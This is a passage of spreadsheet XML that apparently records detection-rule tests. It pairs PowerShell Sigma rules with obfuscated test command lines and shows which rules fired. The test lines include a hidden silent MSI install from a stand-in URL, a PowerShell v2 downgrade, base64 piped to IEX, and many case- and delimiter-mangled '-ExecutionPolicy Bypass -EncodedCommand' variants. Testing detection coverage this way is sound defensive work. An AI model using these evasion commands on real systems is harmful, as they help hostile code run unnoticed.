          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C4283" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D4283" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E4283" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"W" Hidden -"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F4283" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4283" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4283" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4283" s="43" t="n"/>
      <c r="J4283" s="43" t="n"/>
      <c r="K4283" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4284" ht="15.75" customHeight="1" s="42">
      <c r="A4284" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4284" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C4284" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D4284" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E4284" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F4284" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4284" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4284" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4284" s="43" t="n"/>
      <c r="J4284" s="43" t="n"/>
      <c r="K4284" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4285" ht="15.75" customHeight="1" s="42">
      <c r="A4285" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4285" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C4285" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D4285" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E4285" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F4285" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4285" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4285" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4285" s="43" t="n"/>
      <c r="J4285" s="43" t="n"/>
      <c r="K4285" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4286" ht="15.75" customHeight="1" s="42">
      <c r="A4286" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4286" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C4286" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D4286" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E4286" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"v" 2-Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F4286" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4286" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4286" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4286" s="43" t="n"/>
      <c r="J4286" s="43" t="n"/>
      <c r="K4286" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4287" ht="15.75" customHeight="1" s="42">
      <c r="A4287" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4287" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C4287" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D4287" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E4287" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 /"Command" "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F4287" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4287" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4287" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4287" s="43" t="n"/>
      <c r="J4287" s="43" t="n"/>
      <c r="K4287" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4288" ht="15.75" customHeight="1" s="42">
      <c r="A4288" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4288" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C4288" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D4288" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E4288" s="43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4288" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4288" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4288" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4288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4288" s="43" t="n"/>
      <c r="K4288" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4289" ht="15.75" customHeight="1" s="42">
      <c r="A4289" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4289" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C4289" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D4289" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E4289" s="43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4289" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4289" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4289" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4289" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc)</t>
        </is>
      </c>
      <c r="J4289" s="43" t="n"/>
      <c r="K4289" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4290" ht="15.75" customHeight="1" s="42">
      <c r="A4290" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4290" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C4290" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D4290" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E4290" s="43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F4290" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4290" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4290" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4290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4290" s="43" t="n"/>
      <c r="K4290" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4291" ht="15.75" customHeight="1" s="42">
      <c r="A4291" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4291" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C4291" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D4291" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E4291" s="43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F4291" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4291" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4291" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4291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4291" s="43" t="n"/>
      <c r="K4291" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4292" ht="15.75" customHeight="1" s="42">
      <c r="A4292" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4292" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C4292" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D4292" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E4292" s="43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F4292" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4292" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4292" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4292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4292" s="43" t="n"/>
      <c r="K4292" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4293" ht="15.75" customHeight="1" s="42">
      <c r="A4293" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4293" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C4293" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D4293" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E4293" s="43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F4293" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4293" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4293" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4293" s="4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4293" s="43" t="n"/>
      <c r="K4293" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4294" ht="15.75" customHeight="1" s="42">
      <c r="A4294" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4294" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C4294" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D4294" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E4294" s="43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F4294" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4294" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4294" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4294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4294" s="43" t="n"/>
      <c r="K4294" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4295" ht="15.75" customHeight="1" s="42">
      <c r="A4295" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4295" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4295" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4295" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4295" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F4295" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4295" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4295" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4295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4295" s="43" t="n"/>
      <c r="K4295" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4296" ht="15.75" customHeight="1" s="42">
      <c r="A4296" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4296" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4296" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4296" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4296" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F4296" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4296" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4296" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4296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4296" s="43" t="n"/>
      <c r="K4296" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4297" ht="15.75" customHeight="1" s="42">
      <c r="A4297" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4297" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4297" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4297" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4297" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -EncodedCommand V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F4297" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4297" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4297" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4297" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4297" s="43" t="n"/>
      <c r="K4297" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4298" ht="15.75" customHeight="1" s="42">
      <c r="A4298" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4298" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4298" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4298" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4298" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -encODedcommAnd V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F4298" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4298" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4298" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4298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4298" s="43" t="n"/>
      <c r="K4298" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4299" ht="15.75" customHeight="1" s="42">
      <c r="A4299" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4299" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4299" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4299" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4299" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F4299" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4299" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4299" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4299" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4299" s="43" t="n"/>
      <c r="K4299" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4300" ht="15.75" customHeight="1" s="42">
      <c r="A4300" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4300" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4300" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4300" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4300" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -exECUTIonPOLIcY Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F4300" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4300" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4300" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4300" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4300" s="43" t="n"/>
      <c r="K4300" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4301" ht="15.75" customHeight="1" s="42">
      <c r="A4301" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4301" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4301" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4301" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4301" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F4301" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4301" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4301" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4301" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4301" s="43" t="n"/>
      <c r="K4301" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4302" ht="15.75" customHeight="1" s="42">
      <c r="A4302" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4302" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4302" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4302" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4302" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExEcuTiOnPOLiCY Bypass /"EncodedCommand" V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F4302" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4302" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4302" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4302" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4302" s="43" t="n"/>
      <c r="K4302" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4303" ht="15.75" customHeight="1" s="42">
      <c r="A4303" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4303" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4303" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4303" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4303" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EXeCutiONPolICY Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F4303" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4303" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4303" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4303" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4303" s="43" t="n"/>
      <c r="K4303" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4304" ht="15.75" customHeight="1" s="42">
      <c r="A4304" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4304" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4304" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4304" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4304" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass /"EncodedCommand" V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F4304" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4304" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4304" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4304" s="43" t="n"/>
      <c r="J4304" s="43" t="n"/>
      <c r="K4304" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4305" ht="15.75" customHeight="1" s="42">
      <c r="A4305" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4305" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4305" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4305" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4305" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"EncodedCommand" V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F4305" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4305" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4305" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4305" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4305" s="43" t="n"/>
      <c r="K4305" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4306" ht="15.75" customHeight="1" s="42">
      <c r="A4306" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4306" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4306" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4306" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4306" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -EncodeDcomMAND V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F4306" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4306" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4306" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4306" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4306" s="43" t="n"/>
      <c r="K4306" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4307" ht="15.75" customHeight="1" s="42">
      <c r="A4307" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4307" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C4307" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D4307" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E4307" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -exEcuTIonpoLIcy Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F4307" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4307" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4307" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4307" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4307" s="43" t="n"/>
      <c r="K4307" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4308" ht="15.75" customHeight="1" s="42">
      <c r="A4308" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4308" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C4308" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D4308" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E4308" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F4308" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4308" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4308" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4308" s="43" t="n"/>
      <c r="J4308" s="43" t="n"/>
      <c r="K4308" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4309" ht="15.75" customHeight="1" s="42">
      <c r="A4309" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4309" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C4309" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D4309" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E4309" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F4309" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4309" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4309" s="43" t="b">
        <v>1</v>
      </c>
